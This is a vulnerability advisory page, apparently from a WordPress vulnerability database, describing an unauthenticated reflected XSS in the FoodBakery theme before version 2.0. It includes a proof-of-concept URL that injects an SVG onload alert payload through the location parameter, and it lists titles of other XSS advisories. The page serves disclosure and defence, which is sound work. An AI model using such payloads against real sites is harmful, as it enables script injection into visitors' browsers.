FoodBakery < 2.0 – Unauthenticated Reflected XSS

Description

An Unauthenticated Reflected XSS vulnerability was discovered in the FoodBakery theme through 1.9 for WordPress.

Note: The issue was hot patched (in 1.9). As a result, there are two 1.9 versions out there, one vulnerable and one with the patch.

Proof of Concept

http://foodbakery.chimpgroup.com/homev1/listings/?search_title=&location=%22%3E%3Csvg%2Fonload%3Dalert(`XSS`)%3E&foodbakery_locations_position=filter&search_type=custom

Affects Themes

foodbakery

Fixed in 2.0

References

URL

https://themeforest.net/item/food-bakery-restaurant-bakery-responsive-wordpress-theme/18970331

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

6.1 (medium)

Miscellaneous

Original Researcher

Vlad Vector

Submitter

VLΛD VΞCTOR

Submitter website

https://vladvector.ru

Submitter twitter

vlad_vector

Verified

Yes

WPVDB ID

5f6d00ec-98b9-457a-8c65-068ec169a123

Timeline

Publicly Published

2020-08-05 (about 5 years ago)

Added

2020-08-05 (about 5 years ago)

Last Updated

2020-08-31 (about 5 years ago)

Other

Published

Title

Published

2023-04-12

Title

ChatBot < 4.5.1 - Admin+ Stored XSS

Published

2025-06-18

Title

WPBakery Page Builder < 8.5 - Authenticated (Author+) Stored Cross-Site Scripting via Grid Builder

Published

2025-01-03

Title

Media Category Library <= 2.7 - Reflected Cross-Site Scripting

Published

2024-06-22

Title

SULly < 4.3.1 - Admin+ Stored XSS

Published

2025-10-14

Title

Ova Advent < 1.1.8 - Contributor+ Stored XSS